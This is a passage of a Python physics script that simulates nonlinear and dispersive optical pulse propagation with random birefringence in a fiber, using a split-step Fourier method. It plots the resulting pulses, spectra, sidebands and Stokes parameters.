[THz]')\nax.set_xlim(-2*np.max(Tlist)*1e9,2*np.max(Tlist)*1e9)\nplt.grid()\nplt.legend(frameon=False)\nplt.show()\n\n\n\n\n\n\nplt.figure()\nplt.title('Zoom on total input pulse')\nplt.plot(tau*1e9,pulsePower(Pulsetot0),label='E='+str(Etot*1e9)+'nJ.')\nplt.xlabel('Time [ns]')\nplt.ylabel('Power [W]')\nplt.grid()\nplt.axis([-2*Tlist[0]*1e9,2*Tlist[0]*1e9,0,np.max(np.abs(Pulsetot0)**2)*2])\nplt.legend(frameon=False)\nplt.show()\n\nplt.figure()\nplt.title('Total input spectrum')\nplt.plot(fplot,spectralPower(Spectot0)*1e12,label='E='+str(np.round(spectralEnergy(freq,Spectot0)*1e9,4))+'nJ.')\nplt.xlabel('Frequency [THz]')\nplt.ylabel('Power density [W/THz]')\nplt.yscale('log')\nplt.grid()\n#plt.axis([np.min(freq/1e12),np.max(freq/1e12),np.min(np.abs(Awlist)**2*1e12)*1e-6,np.max(np.abs(Awlist)**2*1e12)*10])\nplt.legend(frameon=False)\nplt.show()\n\n\nplt.figure()\nplt.title('Zoom on total input spectrum')\nplt.plot(fplot,spectralPower(Spectot0)*1e12,label='E='+str(np.round(spectralEnergy(freq,Spectot0)*1e9,4))+'nJ.')\nplt.xlabel('Frequency [THz]')\nplt.ylabel('Power density [W/THz]')\nplt.yscale('log')\nplt.grid()\nplt.axis([omegalist[1]/2/pi/1e12,omegalist[0]/2/pi/1e12, 1e-34,1e0])\n#plt.axis([omegalist[1]/1e12/2/pi-50*ws/1e12/2/pi,omegalist[0]/1e12/2/pi+50*ws/1e12/2/pi,np.min(np.abs(Awlist)**2*1e12)*1e-6,np.max(np.abs(Awlist)**2*1e12)*10])\nplt.legend(frameon=False)\nplt.show()\n\n\na,b=getSpectrumFromPulse(tau,Pulsetot0)\nc,d=getPulseFromSpectrum(freq,b)\n\n\nplt.figure()\nplt.plot(freq/1e12,np.log10(spectralPower(b)))\n#plt.plot(freq/1e12,np.log10(spectralPower(d))-10)\nplt.axis([-0.02,0.02,-50,10])\nplt.grid()\nplt.show()\n\n############## Calculate dispersive phase shift ###############\n\nPulsetot_NL=Pulsetot0*np.exp(1j*NL_on*gamma*distance*pulsePower(Pulsetot0))\ns,Specfinal_NL=getSpectrumFromPulse(tau,Pulsetot_NL)\n\nplt.figure()\nplt.title('Expected final spectrum with only NL effect')\nplt.plot(freq/1e12,spectralPower(Spectot0)*1e12,label='E='+str(np.round(spectralEnergy(freq,Spectot0)*1e9,4))+'nJ.')\nplt.plot(freq/1e12,spectralPower(Specfinal_NL)*1e12,'r-',label='E='+str(np.round(spectralEnergy(freq,Specfinal_NL)*1e9,4))+'nJ.')\nplt.xlabel('Frequency [THz]')\nplt.ylabel('Power density [W/THz]')\nplt.yscale('log')\nplt.grid()\nplt.axis([omegalist[1]/1e12/2/pi-5*ws/1e12/2/pi,omegalist[0]/1e12/2/pi+5*ws/1e12/2/pi,np.max(np.abs(Spectot)**2*1e12)*1e-11,np.max(np.abs(Spectot)**2*1e12)*10])\nplt.legend(frameon=False)\nplt.show()\n\ndispersion=np.exp(dispersion_on*0.5*1j*f3w(wm)*(omega)**2*deltaz) \ndisptot=np.exp(dispersion_on*0.5*1j*f3w(wm)*(omega)**2*distance)\nSpecfinal_disp=Spectot0*disptot\n\nplt.figure()\nplt.title('Expected final spectrum with only disp effect')\nplt.plot(fplot,pulsePower(Spectot0)*1e12+1e-100)\nplt.plot(fplot,pulsePower(Specfinal_disp)*1e12+1e-100,'r-')\nplt.xlabel('Frequency [THz]')\nplt.ylabel('Power density [W/THz]')\nplt.yscale('log')\nplt.grid()\n#plt.axis([np.min(fplot),np.max(fplot),np.max(np.abs(Spectot)**2)*1e-9,np.max(np.abs(Spectot)**2)*10])\nplt.legend(frameon=False)\nplt.show()\n\nss,Pulsefinal_disp=getPulseFromSpectrum(freq,Specfinal_disp)\n\n\n\nplt.figure()\nplt.title('Expected final pulse with only disp effect')\nplt.plot(tau*1e9,pulsePower(Pulsetot0),label='E='+str(np.round(pulseEnergy(tau,Pulsetot0)*1e9,rounding))+'nJ.')\nplt.plot(tau*1e9,pulsePower(Pulsefinal_disp),'r-',label='E='+str(np.round(pulseEnergy(tau,Pulsefinal_disp)*1e9,rounding))+'nJ.')\nplt.xlabel('Time [ns]')\nplt.ylabel('Power density 
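# Hedged aside on the "only NL" reference above: for pure self-phase
# modulation the field acquires phi_NL(t) = gamma*L*P(t) while |a(t)| is
# unchanged, which is exactly the closed form applied to Pulsetot_NL.
# With the values set earlier (gamma = 1e-3 /W/m, distance = 2000 m,
# pump peak power 1.84*Pcr), the peak phase is
#     phi_NL = gamma * distance * 1.84/(gamma*distance) = 1.84 rad,
# independent of gamma and distance by construction of Pcr.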
[W]')\nplt.grid()\n#plt.axis([np.min(fplot),np.max(fplot),np.max(np.abs(Spectot)**2)*1e-9,np.max(np.abs(Spectot)**2)*10])\nplt.legend(frameon=False)\nplt.show()\n\n\n#Dispersion phase factor evaluated at mean frequency\n\n\nhhz=NL_on*1j*gamma*deltaz #NL phase factor\n\nboxfilt0=box(freq,omegalist[1]/2/pi+ws/2/pi,np.abs(omegalist[1]-omegalist[0])/10)\nboxfiltm1=box(freq,omegalist[1]/2/pi+ws/2/pi,np.abs(omegalist[1]-omegalist[0])/10)\n\n\n\n#pulsematrix=np.zeros([step_num+1,len(omega)])*1j\n#spectrummatrix=np.zeros([step_num+1,len(omega)])*1j\n#extractionmatrix=np.zeros([step_num+1,len(omega)])*1j\n#extractionmatrixm1=np.zeros([step_num+1,len(omega)])*1j\n\n#pulsematrix[0,:]=Pulsetot0\n#spectrummatrix[0,:]=Spectot0\n#extractionmatrix[0,:]=pulse2\n#extractionmatrixm1[0,:]=pulse1\n\n\ntemp=(Pulsetot0*np.exp(pulsePower(Pulsetot0)*hhz/2)) #apply initial NL phase factor\nfor n in range(1,step_num+1):\n #print(n)\n \n s,f_temp=getSpectrumFromPulse(tau,temp) #Get the spectru from the pulse and apply dispersion \n f_temp=f_temp*dispersion\n \n s,temp=getPulseFromSpectrum(freq,f_temp) #Convert back to a pulse\n #temp=sp.fftpack.fftshift(temp) #Note: Here I have to do an extra FFT shift for some reason. Not sure why, but it works!\n \n bireftheta=random.uniform(-pi,pi)*1.0*Biref_on\n birefphi=random.uniform(-pi/2,pi/2)*1.0*Biref_on\n \n \n temp=temp*np.exp(pulsePower(temp)*hhz) #Apply whole phase factor NL phase factor. \n \n Rmatrix=np.array([[np.cos(bireftheta),np.sin(bireftheta)*np.exp(1j*birefphi)],[-np.sin(bireftheta)*np.exp(-1j*birefphi),np.cos(bireftheta)]])\n \n temp=np.dot(Rmatrix,temp)\n \n #Save pulses and spectra for visualization later\n dummypulse=temp*np.exp(pulsePower(temp)*hhz/2)\n #pulsematrix[n,:]=dummypulse\n s,dummyspec=getSpectrumFromPulse(tau,dummypulse) \n #spectrummatrix[n,:]=dummyspec\n \n# dummyspecextraction=dummyspec*boxfilt0\n# dummyspecextractionm1=dummyspec*boxfiltm1\n \n# s,dummypulseextraction=getPulseFromSpectrum(freq,dummyspecextraction) \n# s,dummypulseextractionm1=getPulseFromSpectrum(freq,dummyspecextractionm1)\n# extractionmatrix[n,:]=dummypulseextraction\n# extractionmatrixm1[n,:]=dummypulseextractionm1\n \n\n #print(np.round(n/step_num*100.0,4)) \n \n #print(\"NSLE solution step number \"+str(n)+\" out of \"+str(step_num))\n if np.round(n/step_num*100.0,4)%10==0.0:\n print(\"Since np.round(n/step_num*100.0,4)%10==0.0 because n=\"+ str(n)+\"we print graphs\") \n #temp=temp*np.exp(np.abs(temp)**2*hhz/2) #Apply final NL phase factor. \n dummyspecextraction=getSideband(freq,dummyspec,(omegalist[1]/2/pi)-fm,omegalist[0]/2/pi-fm,sidebandnumber)\n dummyspecextractionm1=dummyspec*boxfiltm1\n \n s,dummypulseextraction=getPulseFromSpectrum(freq,dummyspecextraction) \n s,dummypulseextractionm1=getPulseFromSpectrum(freq,dummyspecextractionm1)\n \n print(Rmatrix)\n \n plt.figure()\n plt.title('Output pulse. z='+str(n*deltaz/1e3)+'km')\n plt.plot(tau*1e9,pulsePower(Pulsetot0), linewidth=5,label='Input')#'E='+str(np.round(pulseEnergy(tau,pulsetot0)*1e9,rounding))+'nJ. E_th= '+str(Etot_th)+'nJ')\n plt.plot(tau*1e9,pulsePower(Pulsefinal_disp),'r-', linewidth=5,label='Only disp')#'E='+str(np.round(pulseEnergy(tau,pulse_final_only_disp)*1e9,rounding))+'nJ. Only disp')\n plt.plot(tau*1e9,pulsePower(dummypulse), linewidth=5,label='Output')#'E='+str(np.round(pulseEnergy(tau,dummypulse)*1e9,rounding))+'nJ. 
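# Hedged sketch of the loop above, reduced to a scalar symmetrized
# split-step Fourier solver; the real loop additionally applies a random
# birefringence rotation per step, and applies its trailing half-step
# factor with a plus sign rather than the textbook minus used here:
def split_step_scalar(a, omega_grid, beta2, gamma_, dz, n_steps):
    disp_dz = np.exp(0.5j * beta2 * omega_grid ** 2 * dz)         # linear operator per dz
    a = a * np.exp(1j * gamma_ * np.abs(a) ** 2 * dz / 2)         # leading half NL step
    for _ in range(n_steps):
        a = ifft(ifftshift(fftshift(fft(a)) * disp_dz))           # dispersion step (centred grid)
        a = a * np.exp(1j * gamma_ * np.abs(a) ** 2 * dz)         # full NL step
    return a * np.exp(-1j * gamma_ * np.abs(a) ** 2 * dz / 2)     # trailing half step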
E_th= '+str(Etot_th)+'nJ')\n plt.xlabel('Time [ns]')\n plt.ylabel('Power [W]')\n plt.grid()\n plt.legend(frameon=False)\n plt.show()\n\n\n\n\n\n\n plt.figure()\n plt.plot(tau*1e9,pulsePower(dummypulseextraction))\n plt.grid()\n plt.show()\n \n S0=pulsePower(dummypulseextraction)\n S1=(np.abs(dummypulseextraction[0])**2-np.abs(dummypulseextraction[1])**2)/S0\n S2=2*np.real(dummypulseextraction[0]*np.conj(dummypulseextraction[1]))/S0\n S3=-2*np.imag(dummypulseextraction[0]*np.conj(dummypulseextraction[1]))/S0\n \n plt.figure()\n plt.plot(tau*1e9,S0/np.max(S0),label='S0')\n plt.plot(tau*1e9,S1**2*np.sign(S1),label='S1')\n plt.plot(tau*1e9,S2**2*np.sign(S2),label='S2')\n plt.plot(tau*1e9,S3**2*np.sign(S3),label='S3')\n plt.grid()\n plt.legend()\n plt.axis([-50,50,-1.05,1.05])\n plt.show()\n \n# plt.figure()\n# plt.title('Phase of output pulse. z='+str(n*deltaz/1e3)+'km')\n# plt.plot(tau*1e9,getPhase(Pulsetot0[0]), linewidth=5,label='Initial phase x')#'E='+str(np.round(pulseEnergy(tau,pulsetot0)*1e9,rounding))+'nJ. E_th= '+str(Etot_th)+'nJ')\n# plt.plot(tau*1e9,getPhase(Pulsetot0[1]), linewidth=5,label='Initial phase y')#'E='+str(np.round(pulseEnergy(tau,pulsetot0)*1e9,rounding))+'nJ. E_th= '+str(Etot_th)+'nJ')\n# \n# plt.plot(tau*1e9,getPhase(dummypulse[0]), linewidth=5,label='Output phase x')#'E='+str(np.round(pulseEnergy(tau,dummypulse)*1e9,rounding))+'nJ. E_th= '+str(Etot_th)+'nJ')\n# plt.plot(tau*1e9,getPhase(dummypulse[1]), linewidth=5,label='Output phase y')#'E='+str(np.round(pulseEnergy(tau,dummypulse)*1e9,rounding))+'nJ. E_th= '+str(Etot_th)+'nJ')\n# \n# plt.xlabel('Time [ns]')\n# plt.ylabel('Phase [rad]')\n# plt.grid()\n# #plt.axis([np.min(tau)*1e9,np.max(tau)*1e9,-0.5,0.5])\n# plt.legend(frameon=False)\n# plt.show()\n \n# plt.figure()\n# plt.title('Chirp of output pulse. z='+str(n*deltaz/1e3)+'km')\n# plt.plot(tau*1e9,getChirp(tau,Pulsetot0[0])/1e6, linewidth=5,label='Initial chirp x')#'E='+str(np.round(pulseEnergy(tau,pulsetot0)*1e9,rounding))+'nJ. E_th= '+str(Etot_th)+'nJ')\n# plt.plot(tau*1e9,getChirp(tau,Pulsetot0[1])/1e6, linewidth=5,label='Initial chirp y')#'E='+str(np.round(pulseEnergy(tau,pulsetot0)*1e9,rounding))+'nJ. E_th= '+str(Etot_th)+'nJ')\n#\n# plt.plot(tau*1e9,getChirp(tau,dummypulse[0])/1e6, linewidth=5,label='Output chirp x')#'E='+str(np.round(pulseEnergy(tau,dummypulse)*1e9,rounding))+'nJ. E_th= '+str(Etot_th)+'nJ') \n# plt.plot(tau*1e9,getChirp(tau,dummypulse[1])/1e6, linewidth=5,label='Output chirp y')#'E='+str(np.round(pulseEnergy(tau,dummypulse)*1e9,rounding))+'nJ. E_th= '+str(Etot_th)+'nJ') \n# plt.xlabel('Time [ns]')\n# plt.ylabel('Local Chirp [MHz]')\n# plt.grid()\n# #ax.set_xlim(-5*np.max(Tlist)*1e9,5*np.max(Tlist)*1e9)\n# plt.axis([-5*np.max(Tlist)*1e9,5*np.max(Tlist)*1e9,-5/2/np.min(Tlist)/1e6,5/2/np.min(Tlist)/1e6])\n# plt.legend(frameon=False)\n# plt.show()\n \n \n\n# plt.figure()\n# plt.title('Output pulse for m=0. z='+str(n*deltaz/1e3)+'km')\n# plt.plot(tau*1e9,pulsePower(Pulsetot0), linewidth=5,label='Total Input')#'E='+str(np.round(pulseEnergy(tau,pulsetot0)*1e9,rounding))+'nJ. E_th= '+str(Etot_th)+'nJ')\n# plt.plot(tau*1e9,pulsePower(pulse2),'r-', linewidth=5,label='m=0 Input')#'E='+str(np.round(pulseEnergy(tau,pulse_final_only_disp)*1e9,rounding))+'nJ. Only disp')\n# plt.plot(tau*1e9,pulsePower(dummypulseextraction), linewidth=5,label='m=0 Output')#'E='+str(np.round(pulseEnergy(tau,dummypulse)*1e9,rounding))+'nJ. 
E_th= '+str(Etot_th)+'nJ')\n# plt.xlabel('Time [ns]')\n# plt.ylabel('Power [W]')\n# plt.yscale('log')\n# plt.grid()\n# plt.legend(frameon=False)\n# plt.show()\n# \n# plt.figure()\n# plt.title('Chirp of m=0 pulse. z='+str(n*deltaz/1e3)+'km')\n# plt.plot(tau*1e9,getChirp(tau,pulse2[0])/1e9, linewidth=5,label='Initial chirp x')#'E='+str(np.round(pulseEnergy(tau,pulsetot0)*1e9,rounding))+'nJ. E_th= '+str(Etot_th)+'nJ')\n# plt.plot(tau*1e9,getChirp(tau,pulse2[1])/1e9, linewidth=5,label='Initial chirp y')#'E='+str(np.round(pulseEnergy(tau,pulsetot0)*1e9,rounding))+'nJ. E_th= '+str(Etot_th)+'nJ')\n# \n# plt.plot(tau*1e9,getChirp(tau,dummypulseextraction[0])/1e9, linewidth=5,label='Output x')#'E='+str(np.round(pulseEnergy(tau,dummypulse)*1e9,rounding))+'nJ. E_th= '+str(Etot_th)+'nJ')\n# plt.plot(tau*1e9,getChirp(tau,dummypulseextraction[1])/1e9, linewidth=5,label='Output y')#'E='+str(np.round(pulseEnergy(tau,dummypulse)*1e9,rounding))+'nJ. E_th= '+str(Etot_th)+'nJ')\n#\n# plt.xlabel('Time [ns]')\n# plt.ylabel('Local Chirp [GHz]')\n# \n# plt.grid()\n# plt.axis([-5*np.max(Tlist)*1e9,5*np.max(Tlist)*1e9,12,13])\n# \n# #plt.axis([-5*np.max(Tlist)*1e9,5*np.max(Tlist)*1e9,-1/4/np.min(Tlist)/1e6,1/4/np.min(Tlist)/1e6])\n# plt.legend(frameon=False)\n# plt.show()\n \n \n# plt.figure()\n# plt.title('Output pulse for m=0. z='+str(n*deltaz/1e3)+'km')\n# plt.plot(tau*1e9,10*np.log10(np.abs(Pulsetot0)**2/np.max(np.abs(Pulsetot0)**2)), linewidth=5,label='Total Input')#'E='+str(np.round(pulseEnergy(tau,pulsetot0)*1e9,rounding))+'nJ. E_th= '+str(Etot_th)+'nJ')\n# plt.plot(tau*1e9,10*np.log10((np.abs(pulse2)**2)/np.max(np.abs(pulse2)**2)),'r-', linewidth=5,label='m=0 Input')#'E='+str(np.round(pulseEnergy(tau,pulse_final_only_disp)*1e9,rounding))+'nJ. Only disp')\n# plt.plot(tau*1e9,10*np.log10(np.abs(dummypulseextraction)**2/np.max(np.abs(pulse2)**2)), linewidth=5,label='m=0 Output')#'E='+str(np.round(pulseEnergy(tau,dummypulse)*1e9,rounding))+'nJ. E_th= '+str(Etot_th)+'nJ')\n# plt.xlabel('Time [ns]')\n# plt.ylabel('Power rel. to max input [dB]')\n# plt.axis([np.min(tau*1e9),np.max(tau*1e9),-50,50])\n# plt.grid()\n# plt.legend(frameon=False)\n# plt.show()\n\n\n###\n# plt.figure()\n# plt.title('Output pulse for m=-1. z='+str(n*deltaz/1e3)+'km')\n# plt.plot(tau*1e9,np.abs(Pulsetot0)**2, linewidth=5,label='Total Input')#'E='+str(np.round(pulseEnergy(tau,pulsetot0)*1e9,rounding))+'nJ. E_th= '+str(Etot_th)+'nJ')\n# plt.plot(tau*1e9,np.abs(pulse1)**2,'r-', linewidth=5,label='m=-1 Input')#'E='+str(np.round(pulseEnergy(tau,pulse_final_only_disp)*1e9,rounding))+'nJ. Only disp')\n# plt.plot(tau*1e9,np.abs(dummypulseextractionm1)**2, linewidth=5,label='m=-1 Output')#'E='+str(np.round(pulseEnergy(tau,dummypulse)*1e9,rounding))+'nJ. E_th= '+str(Etot_th)+'nJ')\n# plt.xlabel('Time [ns]')\n# plt.ylabel('Power [W]')\n# plt.yscale('log')\n# plt.grid()\n# plt.axis([np.min(tau)*1e9,np.max(tau)*1e9,1e-30,np.max(np.abs(Pulsetot0)**2)*2])\n# plt.legend(frameon=False)\n# plt.show()\n# \n# plt.figure()\n# plt.title('Output pulse for m=-1. z='+str(n*deltaz/1e3)+'km')\n# plt.plot(tau*1e9,10*np.log10(np.abs(Pulsetot0)**2/np.max(np.abs(Pulsetot0)**2)), linewidth=5,label='Total Input')#'E='+str(np.round(pulseEnergy(tau,pulsetot0)*1e9,rounding))+'nJ. E_th= '+str(Etot_th)+'nJ')\n# plt.plot(tau*1e9,10*np.log10((np.abs(pulse1)**2)/np.max(np.abs(pulse1)**2)),'r-', linewidth=5,label='m=-1 Input')#'E='+str(np.round(pulseEnergy(tau,pulse_final_only_disp)*1e9,rounding))+'nJ. 
Only disp')\n# plt.plot(tau*1e9,10*np.log10(np.abs(dummypulseextractionm1)**2/np.max(np.abs(pulse1)**2)), linewidth=5,label='m=-1 Output')#'E='+str(np.round(pulseEnergy(tau,dummypulse)*1e9,rounding))+'nJ. E_th= '+str(Etot_th)+'nJ')\n# plt.xlabel('Time [ns]')\n# plt.ylabel('Power rel. to max input [dB]')\n# plt.axis([np.min(tau*1e9),np.max(tau*1e9),-50,50])\n# plt.grid()\n# plt.legend(frameon=False)\n# plt.show()\n####\n\n plt.figure()\n plt.title('Output Spectrum. z='+str(n*deltaz/1e3)+'km')\n plt.plot(fplot,spectralPower(Spectot0)*1e12, linewidth=5,label='Input')#'E='+str(np.round(spectralEnergy(freq,Spectot0)*1e9,4))+'nJ. E_th= '+str(E1_th+E2_th)+'nJ')\n #plt.plot(freq/1e12,np.abs(Specfinal_NL)**2*1e12,'r-', linewidth=5,label='Only NL')#label='E='+str(np.round(spectralEnergy(freq,specfinal)*1e9,4))+'nJ. E_th= '+str(E1_th+E2_th)+'nJ. Only NL')\n plt.plot(fplot,spectralPower(dummyspec)*1e12, linewidth=5,label='Output')#'E='+str(np.round(spectralEnergy(freq,dummyspec)*1e9,4))+'nJ. E_th= '+str(E1_th+E2_th)+'nJ')\n plt.plot(fplot,spectralPower(dummyspecextraction)*1e12, linewidth=5,label='n='+str(sidebandnumber))#'E='+str(np.round(spectralEnergy(freq,dummyspec)*1e9,4))+'nJ. E_th= '+str(E1_th+E2_th)+'nJ')\n plt.axis([fplot[int(len(fplot)/2-len(fplot)/10)],fplot[int(len(fplot)/2+len(fplot)/10)],1e-30,1e0])\n \n plt.plot((omegalist[0]+wm)/2/pi/1e12,1e-10,'r.',markersize=25)\n plt.plot((omegalist[1]+wm)/2/pi/1e12,1e-10,'m.',markersize=25)\n \n plt.xlabel('Frequency [THz]')\n plt.ylabel('Power density [W/THz]')\n plt.yscale('log')\n plt.grid()\n #plt.axis([fm/1e12-0.0005,fm/1e12+0.0005,1e-35,1e13])\n #plt.axis([omegalist[1]/1e12/2/pi-5*ws/2/pi/1e12,omegalist[0]/1e12/2/pi+5*ws/2/pi/1e12,np.max(np.abs(Spectot0)**2*1e12)*1e-15,np.max(np.abs(Spectot0)**2*1e12)*10])\n #plt.axis([omegalist[0]/2/pi/1e12-0.0005,omegalist[0]/2/pi/1e12+0.0005,1e-40,1e8])\n #plt.axis([np.min(freq/1e12),np.max(freq/1e12),np.max(np.abs(Spectot0)**2*1e12)*1e-9,np.max(np.abs(Spectot0)**2*1e12)*10])\n plt.legend(frameon=False)\n plt.show()\n print(np.round(n/step_num*100.0,4))\n \n \n \n\n\npulsetot=temp*np.exp(pulsePower(temp)*hhz/2) #Apply final phase factor\ns,Spectot=getSpectrumFromPulse(tau,pulsetot)\n\nplt.figure()\n#plt.plot(tau*1e9,np.abs(pulsematrix[10,:])**2)\nplt.plot(tau*1e9,pulsePower(pulsetot))\n\nplt.figure()\nplt.title('Output pulse. z='+str(distance/1e3)+'km')\nplt.plot(tau*1e9,pulsePower(Pulsetot0), linewidth=5,label='Input')#label='E='+str(np.round(pulseEnergy(tau,pulsetot0)*1e9,rounding))+'nJ. E_th= '+str(Etot_th)+'nJ')\nplt.plot(tau*1e9,pulsePower(Pulsefinal_disp),'r-', linewidth=5,label='only disp')#label='E='+str(np.round(pulseEnergy(tau,pulse_final_only_disp)*1e9,rounding))+'nJ.')\nplt.plot(tau*1e9,pulsePower(pulsetot), linewidth=5,label='Output')#='E='+str(np.round(pulseEnergy(tau,pulsetot)*1e9,rounding))+'nJ. E_th= '+str(Etot_th)+'nJ')\nplt.xlabel('Time [ns]')\nplt.ylabel('Power [W]')\nplt.grid()\nplt.legend(frameon=False)\nplt.show()\n\n\n\n\n#plt.figure()\n#plt.title('Chirp of Output pulse. z='+str(distance/1e3)+'km')\n#plt.plot(tau*1e9,getChirp(tau,Pulsetot0)/1e12, linewidth=5,label='Input')#label='E='+str(np.round(pulseEnergy(tau,pulsetot0)*1e9,rounding))+'nJ. E_th= '+str(Etot_th)+'nJ')\n#plt.plot(tau*1e9,getChirp(tau,Pulsefinal_disp)/1e12,'r-', linewidth=5,label='only disp')#label='E='+str(np.round(pulseEnergy(tau,pulse_final_only_disp)*1e9,rounding))+'nJ.')\n#plt.plot(tau*1e9,getChirp(tau,pulsetot)/1e12, linewidth=5,label='Output')#='E='+str(np.round(pulseEnergy(tau,pulsetot)*1e9,rounding))+'nJ. 
E_th= '+str(Etot_th)+'nJ')\n#plt.xlabel('Time [ns]')\n#plt.ylabel('Chirp [THz]')\n#plt.grid()\n#plt.legend(frameon=False)\n#plt.show()\n\n\n\nplt.figure()\nplt.title('Output Spectrum. z='+str(distance/1e3)+'km')\nplt.plot(freq/1e12,spectralPower(Spectot0)*1e12, linewidth=5,label='Input')#'E='+str(np.round(spectralEnergy(freq,Spectot0)*1e9,4))+'nJ. E_th= '+str(E1_th+E2_th)+'nJ')\nplt.plot(freq/1e12,spectralPower(Specfinal_NL)*1e12, 'r-',linewidth=5,label='Only NL')#'E='+str(np.round(spectralEnergy(freq,specfinal)*1e9,4))+'nJ. E_th= '+str(E1_th+E2_th)+'nJ')\nplt.plot(freq/1e12,spectralPower(Spectot)*1e12, linewidth=5,label='Output')#'E='+str(np.round(spectralEnergy(freq,Spectot)*1e9,4))+'nJ. E_th= '+str(E1_th+E2_th)+'nJ')\nplt.plot(freq/1e12,boxfilt0, linewidth=5,label='boxfilt0')#'E='+str(np.round(spectralEnergy(freq,Spectot)*1e9,4))+'nJ. E_th= '+str(E1_th+E2_th)+'nJ')\nplt.plot(freq/1e12,boxfiltm1, linewidth=5,label='boxfiltm1')#'E='+str(np.round(spectralEnergy(freq,Spectot)*1e9,4))+'nJ. E_th= '+str(E1_th+E2_th)+'nJ')\nplt.xlabel('Frequency [THz]')\nplt.ylabel('Power density [W/THz]')\nplt.yscale('log')\nplt.grid()\nplt.axis([-0.1,0.1,np.max(np.abs(Spectot0)**2*1e12)*1e-9,np.max(np.abs(Spectot0)**2*1e12)*10])\nplt.legend(frameon=False)\nplt.show()\n\nminus2Spectrum=getSideband(freq,Spectot,omegalist[1]/2/pi-fm,omegalist[0]/2/pi-fm,sidebandnumber)\n\ntt,minus2Pulse=getPulseFromSpectrum(freq,minus2Spectrum)\n\n\n\n\nplt.figure()\nplt.plot(tau*1e9,pulsePower(minus2Pulse))\nplt.grid()\nplt.show()\n\nS0=pulsePower(minus2Pulse)\nS1=(np.abs(minus2Pulse[0])**2-np.abs(minus2Pulse[1])**2)/S0\nS2=2*np.real(minus2Pulse[0]*np.conj(minus2Pulse[1]))/S0\nS3=-2*np.imag(minus2Pulse[0]*np.conj(minus2Pulse[1]))/S0\n\nfig,ax=plt.subplots()\nplt.title('Output Pol. for n='+str(sidebandnumber)+' sideband (Numerical)')\nplt.plot(tau*1e9,pulsePower(pulse1)/np.max(pulsePower(pulse1)),'m--',label='Input Pulse')\nplt.plot(tau*1e9,S0/np.max(S0),'--',label='S0')\nplt.plot(tau*1e9,S1**2*np.sign(S1),'--',label='S1')\nplt.plot(tau*1e9,S2**2*np.sign(S2),'--',label='S2')\nplt.plot(tau*1e9,S3**2*np.sign(S3),'--',label='S3')\nplt.grid()\nplt.legend(loc='upper right')\nax.legend(loc='upper center', bbox_to_anchor=(1.25, 0.8),\n ncol=1, fancybox=True, shadow=True)\nax.spines['top'].set_visible(False)\nax.spines['right'].set_visible(False)\nplt.axis([-50,50,-1.05,1.05])\nplt.show()\n\n\nS1=(np.abs(pol1[0])**2-np.abs(pol1[1])**2)*np.ones_like(pulse1[0])\nS2=2*np.real(pol1[0]*np.conj(pol1[1]))*np.ones_like(pulse1[0])\nS3=-2*np.imag(pol1[0]*np.conj(pol1[1]))*np.ones_like(pulse1[0])\n\nplt.figure()\nplt.title('Input Polarization for signal (n=-1)')\nplt.plot(tau*1e9,pulsePower(pulse1)/np.max(pulsePower(pulse1)),label='S0')\nplt.plot(tau*1e9,np.abs(S1)**2*np.sign(S1),label='S1')\nplt.plot(tau*1e9,np.abs(S2)**2*np.sign(S2),label='S2')\nplt.plot(tau*1e9,np.abs(S3)**2*np.sign(S3),label='S3')\nplt.grid()\nplt.legend()\nplt.axis([-50,50,-1.05,1.05])\nplt.show()\n\n\n\nS1=(np.abs(pol2[0])**2-np.abs(pol2[1])**2)*np.ones_like(pulse2[0])\nS2=2*np.real(pol2[0]*np.conj(pol2[1]))*np.ones_like(pulse2[0])\nS3=-2*np.imag(pol2[0]*np.conj(pol2[1]))*np.ones_like(pulse2[0])\n\nplt.figure()\nplt.title('Input Polarization for pump 
(n=0)')\nplt.plot(tau*1e9,pulsePower(pulse2)/np.max(pulsePower(pulse2)),label='S0')\nplt.plot(tau*1e9,np.abs(S1)**2*np.sign(S1),label='S1')\nplt.plot(tau*1e9,np.abs(S2)**2*np.sign(S2),label='S2')\nplt.plot(tau*1e9,np.abs(S3)**2*np.sign(S3),label='S3')\nplt.grid()\nplt.legend()\nplt.axis([-50,50,-1.05,1.05])\nplt.show()\n\n#print(\" \")\n#print(\"Begin creating animation of the evolution of the spectrum\")\n#print(\" \")\n#@gif.frame\n#def plot(i,Spectot0,Specfinal_NL,spectrummatrix):\n# \n# \n# plt.figure(figsize=(10, 6), dpi=gifsize)#\n# plt.title('z = '+str(np.round(i/10*distance/1e3,rounding))+'km')\n# \n# plt.plot(freq/1e12, np.abs(spectrummatrix[i*10,:])**2*1e12+1e-100,'r-',label='Output') \n# plt.plot(freq/1e12, np.abs(Spectot0)**2*1e12+1e-100,'b-',alpha=0.7,label='Input')\n# #plt.plot(freq/1e12, np.abs(Specfinal_NL)**2*1e12, 'r-',label='Only NL')\n# plt.xlabel('Frequency [THz]')\n# plt.ylabel('Power density [W/THz]')\n# plt.yscale('log')\n# plt.grid()\n# #plt.axis([omegalist[1]/1e12/2/pi-5*ws/2/pi/1e12,omegalist[0]/1e12/2/pi+5*ws/2/pi/1e12,np.max(np.abs(Spectot0)**2*1e12)*1e-15,np.max(np.abs(Spectot0)**2*1e12)*10])\n# \n# #plt.axis([0.072,0.076,np.max(np.abs(Spectot0)**2*1e12)*1e-15,np.max(np.abs(Spectot0)**2*1e12)*10])\n# plt.legend(loc=\"upper right\", bbox_to_anchor=(0.8,0.7),frameon=False)\n# #plt.show()\n\n#frames = []\n#print (frames)\n#for i in range(0,11):\n# frame = plot(i,Spectot0,Specfinal_NL,spectrummatrix)\n# frames.append(frame)\n# print(np.round(i/(11)*100,rounding))\n#\n#frame = plot(10,Spectot0,Specfinal_NL,spectrummatrix)\n#frames.append(frame)\n#\n#gif.save(frames, \"C:\\\\Users\\\\Bruger\\\\Dropbox\\\\Canada\\\\PhD\\\\Research Questions\\\\High Ext pulses\\\\Resolution enhancement\\\\EvolvingSpectrum.gif\", duration=700)\n#\n#print(\" \")\n#print(\"Finished the animation of the spectrum\")\n#print(\" \")\n#\n#print(\" \")\n#print(\"Begin creating animation of the evolution of the pulse\")\n#print(\" \")\n#\n#@gif.frame\n#def plot2(i,pulsetot0,Pulsefinal_disp,pulsematrix):\n# \n# \n# plt.figure(figsize=(10, 6), dpi=gifsize)#\n# plt.title('z = '+str(np.round(i/10*distance/1e3,rounding))+'km')\n# plt.plot(tau*1e9, np.abs(pulsetot0)**2+1e-100,label='Input')\n# plt.plot(tau*1e9, np.abs(Pulsefinal_disp)**2+1e-100, 'r-',label='Only Disp')\n# plt.plot(tau*1e9, np.abs(pulsematrix[i*10,:])**2+1e-100,label='Output') \n# \n# plt.xlabel('Time 